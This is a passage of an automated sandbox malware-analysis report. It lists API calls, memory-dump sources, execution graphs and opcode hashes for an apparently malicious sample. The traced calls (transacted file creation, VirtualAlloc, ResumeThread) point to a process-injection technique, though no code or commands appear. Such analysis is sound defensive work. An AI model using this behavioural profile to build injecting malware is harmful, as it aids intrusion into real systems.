                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0088DA55,?), ref: 0088E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0088DA55,?), ref: 0088E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
                                                              • Instruction ID: 374daad87327dfce96e87facd162a1f3b447c2917c48688ada6fac5e4f338458
                                                              • Opcode Fuzzy Hash: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
                                                              • Instruction Fuzzy Hash: 05C01231284F2066E63037646C0DB836B98BF01B11F050548B181EA2D2D6A5D54187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:17.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:26
                                                              Total number of Limit Nodes:2
                                                              execution_graph 13990 7ff848f49ebd 13991 7ff848faffe0 13990->13991 13992 7ff848fb0052 13991->13992 13995 7ff848faf1d0 13991->13995 13994 7ff848fb00c9 13997 7ff848faf1db 13995->13997 13996 7ff848faf27e 13996->13994 13997->13996 13999 7ff848faf297 13997->13999 14000 7ff848faf2a2 13999->14000 14001 7ff848faf2ea ResumeThread 13999->14001 14000->13996 14003 7ff848faf3b4 14001->14003 14003->13996 13974 7ff848f4bc35 13976 7ff848f4bc5f WriteFile 13974->13976 13977 7ff848f4bdcf 13976->13977 13978 7ff848f4da35 13979 7ff848f4da5f VirtualAlloc 13978->13979 13981 7ff848f4db7f 13979->13981 13982 7ff848f4a390 13983 7ff848f4a39c 13982->13983 13986 7ff848f49fb0 13983->13986 13985 7ff848f4a400 13987 7ff848f49fb9 CreateFileTransactedW 13986->13987 13989 7ff848f4bba8 13987->13989 13989->13985 14004 7ff848f4d5d1 14005 7ff848f4d5ed GetSystemInfo 14004->14005 14007 7ff848f4d6c5 14005->14007

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: o,_^$p,_^$q,_^$r,_^
                                                              • API String ID: 0-3953216542
                                                              • Opcode ID: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
                                                              • Instruction ID: cdbb27a68b0ed8b25e87cce36cb920b654c9dd05f047efa71812daa096243ba3
                                                              • Opcode Fuzzy Hash: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
                                                              • Instruction Fuzzy Hash: D7828863C1F2D29FE661BA78B8A60E77BB0EF022BDF1842B7D04C8D093DD0D65458659
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2229 7ff848f4b98a-7ff848f4b997 2230 7ff848f4b999-7ff848f4b9a1 2229->2230 2231 7ff848f4b9a2-7ff848f4ba68 2229->2231 2230->2231 2235 7ff848f4ba6a-7ff848f4ba81 2231->2235 2236 7ff848f4ba84-7ff848f4bba6 CreateFileTransactedW 2231->2236 2235->2236 2237 7ff848f4bbae-7ff848f4bc30 2236->2237 2238 7ff848f4bba8 2236->2238 2238->2237
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileTransacted
                                                              • String ID:
                                                              • API String ID: 2149338676-0
                                                              • Opcode ID: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
                                                              • Instruction ID: 8eac32b847cc3fae0a4467446e05b98bc48e75436032f6a2287483ddc235e263
                                                              • Opcode Fuzzy Hash: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
                                                              • Instruction Fuzzy Hash: 56912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
                                                              • Instruction ID: 5a63cda99387ba3245ea57d7ab3e02b82957f6515fe861051c7723bfb1abf6b2
                                                              • Opcode Fuzzy Hash: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
                                                              • Instruction Fuzzy Hash: 8D81EF70908A1C8FDB98EF58C894BA9BBF1FB69300F1051AED04EE3651DB75A984CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
                                                              • Instruction ID: 1f5228a33e291d6f7a95c0cd6db5f3f357b01d326cd2b202037624ed7de78ede
                                                              • Opcode Fuzzy Hash: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
                                                              • Instruction Fuzzy Hash: 0AF11230A1DA458FE768EF28948257577E0FF95394B1446BAD04EC7297DA28E843CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
                                                              • Instruction ID: f62933348f1a23e9f90160c62da1b4d4282120e7f69f3258cea186b97c9037a1
                                                              • Opcode Fuzzy Hash: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
                                                              • Instruction Fuzzy Hash: 46612470908A5C8FDB98DF58C885BE9BBF0FB69311F1001AED04DE3292DB74A985CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
                                                              • Instruction ID: e2caf8db9c699fa071342083ad3132570a7e8915d406b9fe2a1a6c30ea172e9a
                                                              • Opcode Fuzzy Hash: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
                                                              • Instruction Fuzzy Hash: AB416D71908A4C8FEB98EF98D849AE9BBF0FB65311F00416BD04DD7292DB34A849CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
                                                              • Instruction ID: 73115f95258ab27ec786ae3f03036b461646455cceac557d8edcd9b78a423a7b
                                                              • Opcode Fuzzy Hash: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
                                                              • Instruction Fuzzy Hash: EF413874D08A0C8FDB98EF98D885AEDBBF0FB59310F10416AD40DE7252DB75A886CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
                                                              • Instruction ID: 917a431441ed0f57000f03d7b046d5f91350259009167eed41a194c5b2f713f0
                                                              • Opcode Fuzzy Hash: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
                                                              • Instruction Fuzzy Hash: 0041A17090D68C8FDB99EFA8D849BE9BBF0EF66310F0441ABD04DD7292DA745845CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
                                                              • Instruction ID: 313d0dad4cd2f05919efb173a1b7b952c165b8aa3fd99bb515458dcf1d1a6c4d
                                                              • Opcode Fuzzy Hash: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
                                                              • Instruction Fuzzy Hash: 82512A70918A5C8FDB58EF58C855BE9BBF0FB69314F1041AAD04DE3252DB70A985CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
                                                              • Instruction ID: 7dc12eb89850059491261dda7fcdc42fb7bb062fdf5deb4c6db6046b60cacdc6
                                                              • Opcode Fuzzy Hash: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
                                                              • Instruction Fuzzy Hash: 28512831D1D68A9FEB69EF98C4555BDBBB1FF54340F1041BBC00EA7282DA39A905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
                                                              • Instruction ID: bdddc9e40d8d6c1a483b55ecf361511547778db8f66c47e41cd5d7f82bb46e4b
                                                              • Opcode Fuzzy Hash: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
                                                              • Instruction Fuzzy Hash: 2C511770D0C58A9FEB69EFA884545BDBBB1FF55340F5041AAC00EE72C2DA38A905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: s&
                                                              • API String ID: 0-841890644
                                                              • Opcode ID: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
                                                              • Instruction ID: e06057985d3884ab6b0ca0b59c4940a9fcc3bbf09c992ac87faeb96117f9cfd1
                                                              • Opcode Fuzzy Hash: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
                                                              • Instruction Fuzzy Hash: 7D31A771E1C98A8FFB79BB2898125A4B7E1FF45351F44017BD01DC76C2DE1CA8468B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: s&
                                                              • API String ID: 0-841890644
                                                              • Opcode ID: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
                                                              • Instruction ID: 67c9ddc3dbe0f5a3718b7a7b6c776b47e9199fdeb807d7a78fdf671be26a6431
                                                              • Opcode Fuzzy Hash: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
                                                              • Instruction Fuzzy Hash: 0F21D970E1885D9FDFA9EF58C465AEDB7B1FF68314F0001AAD00EE3291CA39A9418F41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
                                                              • Instruction ID: d1c04e1f8ed32a511be7f380cbefc96862d741af65e1125fe64f21c4d97f3708
                                                              • Opcode Fuzzy Hash: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
                                                              • Instruction Fuzzy Hash: DB71A335A0C58A8FF7B8EE08C845EB437E1FF49351B1442BBD55EC75A1DA2DE8068B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
                                                              • Instruction ID: fc05d461705a9ab45b6896edcc25ebb4dbbb35313f7040ecfc90429660cd912a
                                                              • Opcode Fuzzy Hash: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
                                                              • Instruction Fuzzy Hash: 7A9147705196428FEB2DDF18D1E05B137B1FF49351B5045BEC84E8B68ADB38E892CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
                                                              • Instruction ID: 363792f0f5e381827304cdb1a4d67c72522a4977d400b21fdc3217626cb4b286
                                                              • Opcode Fuzzy Hash: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
                                                              • Instruction Fuzzy Hash: 429169705186428FEB2CDF18D0E15B537B1FF49351B5045BEC84E8B68ADB38E892CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
                                                              • Instruction ID: 01c0034ef6fa4260e36c1b54669ba5037b05322d1a494b934c7b7f4eb435d71a
                                                              • Opcode Fuzzy Hash: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
                                                              • Instruction Fuzzy Hash: C7717E30D1D68A9EEB75FF6488546BCBBB0FF59380F1009BAD00ED3195DA2CA9418B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
                                                              • Instruction ID: 5355c60cae8895683addc74368cd3fd02abcce6faa33f076f609fe32c27b22a2
                                                              • Opcode Fuzzy Hash: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
                                                              • Instruction Fuzzy Hash: 37817830A4DB868FF3B9EE28C19597177B1FF04354B54057EC48E87A96EA2DF8428B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
                                                              • Instruction ID: e6c2998e5370a61975d8e009b28c7e75b3734334d96f55e72b4765bc2d9ae2f3
                                                              • Opcode Fuzzy Hash: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
                                                              • Instruction Fuzzy Hash: 2781753091CB868FE379EE18C091561BBB1FF44794B64097AC48F87A96CA7DF842CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
                                                              • Instruction ID: b2159dbef8e1207fbffc1c4c2b07569ce9188bff9a9e63e9be418c0ccc689129
                                                              • Opcode Fuzzy Hash: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
                                                              • Instruction Fuzzy Hash: 8951217160DB894FE769AE2898865707BF0EF563A075502BFC08EC71A3D929F847CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6a752edca684adc5dc06db8304e0cc289dbd9772efcc9ceba5f05b6bd9d04a4
                                                              • Instruction ID: 3ebbef2c9debd0a1c595658006dbc79fc0a01bec3e66455205c3f7f4a91f5f7c
                                                              • Opcode Fuzzy Hash: f6a752edca684adc5dc06db8304e0cc289dbd9772efcc9ceba5f05b6bd9d04a4
                                                              • Instruction Fuzzy Hash: B861AC70D1D68A9EFBB5EF6888546BDBBB2FF44380F5001BAD00ED7191DA2CA841CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6841bc62082e555bbb8c38f41440786a6bcbd3b78d7731511742d327ea91747
                                                              • Instruction ID: 06368dd3cf49e371ed93cb3cfae1f0442240f7e0aae9298fe91efa1218e32fb4
                                                              • Opcode Fuzzy Hash: f6841bc62082e555bbb8c38f41440786a6bcbd3b78d7731511742d327ea91747
                                                              • Instruction Fuzzy Hash: 9361C872C1F2D29FF262BA7868620E93BB0EF0626DF1801B7D09D8E0D3ED1C64468655
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f7a32c3d58c6f9f04dad8b50b28a667d80eaad7203538bf4daae2bfe0dd3139
                                                              • Instruction ID: f60c03c434db38dcda4b13c1fc1451c9bf236d801facc2b73c2a92a1fee2bde8
                                                              • Opcode Fuzzy Hash: 1f7a32c3d58c6f9f04dad8b50b28a667d80eaad7203538bf4daae2bfe0dd3139
                                                              • Instruction Fuzzy Hash: 00514A70E08A5D8FDB95EF68D895AEDBBB1FF58340F14016AD00DE7252DB38A981CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb2bfe008641e1b434b39f41df589b4baaed51f17ac1eed4ccc8763d7f63c2d0
                                                              • Instruction ID: fcf8aeb1d055e0eed09d59585f6d42bc4e5010df36f2730623cae38e5e2a564f
                                                              • Opcode Fuzzy Hash: cb2bfe008641e1b434b39f41df589b4baaed51f17ac1eed4ccc8763d7f63c2d0
                                                              • Instruction Fuzzy Hash: FF51B371D1E6D99FEB61FB78A8604E93BB0EF45364F0402BBD04DCA193DA2CA805CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8011ea0e4c17b0b3ca684a5205eb2981c9079bf976969c16e4f4b99e592196c0
                                                              • Instruction ID: 2d25d4b69cd3b33ae88583e42dab6cc2325bfa5831a1838651dba14af9ea057f
                                                              • Opcode Fuzzy Hash: 8011ea0e4c17b0b3ca684a5205eb2981c9079bf976969c16e4f4b99e592196c0
                                                              • Instruction Fuzzy Hash: 3F51D962C1E2D69FF266BA3828620F93BB0EF1626DF1801B7D09D8E0C3ED0D64468655
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba931f666e062c01477332701d55c1ac1b09561e39d6818dce98e7df060ee146
                                                              • Instruction ID: 147eab39cf9dfbbd4bf54b01ff1c6f849e8c85cd226de8e1d2fdc5a532375f11
                                                              • Opcode Fuzzy Hash: ba931f666e062c01477332701d55c1ac1b09561e39d6818dce98e7df060ee146
                                                              • Instruction Fuzzy Hash: 4F41D762D0F2D69FF276BA3828651F93BA0AF56699F1901F7C09E8B0C3DC0C28454796
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3164f3fc483bb3cd97813725111c41a98a5db4dff349e22bab6ee5ec5247f863
                                                              • Instruction ID: d26ae45ef27f49f68c643d5b42984414f78240f0aca00f1900b3ab681225a882
                                                              • Opcode Fuzzy Hash: 3164f3fc483bb3cd97813725111c41a98a5db4dff349e22bab6ee5ec5247f863
                                                              • Instruction Fuzzy Hash: 31412570D1C5AE8FF779AA288464AB877B5FF54340F1441BBC04EC7586DE3CA8869B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6761644a44785cbf448e83ed173388761359e779ef6165cb7ebc8ef257bd7dc3
                                                              • Instruction ID: b940f85d230a8f7a3f4db16b1e2dce6a48ae64429de69b223d7baa2833c69049
                                                              • Opcode Fuzzy Hash: 6761644a44785cbf448e83ed173388761359e779ef6165cb7ebc8ef257bd7dc3
